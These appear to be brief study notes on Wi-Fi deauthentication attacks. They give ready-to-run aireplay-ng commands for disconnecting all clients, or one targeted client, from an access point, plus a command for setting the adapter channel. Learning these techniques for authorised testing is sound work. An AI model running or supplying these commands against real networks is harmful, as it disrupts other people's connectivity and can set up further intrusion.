Deauthentication Attack

Which deauthenticate users or specific user on AP

image.png

spoof client and send message to AP Deauthentication


Spoof AP and send message to clients


We use Two Alpha cart →> one for attack and other for monitor mode(sniffing packet)


aireplay-ng Tool

Deauthenticate All users

aireplay-ng --deauth 10000 -a Target_Ap_Mac_Address wlan1mon

# 1000 -> refer to nummber of packet

To solve this error u must change channel of your adapter manual

iwconfig wlan1mon channel 1

Deauthenticate Specific user

aireplay-ng --deauth 10000 -a Target_Ap_Mac_Address -c MAc_specific_Suser wlan1mon

# we found this mac usinf cart 0 which work on sniffing packet

Last updated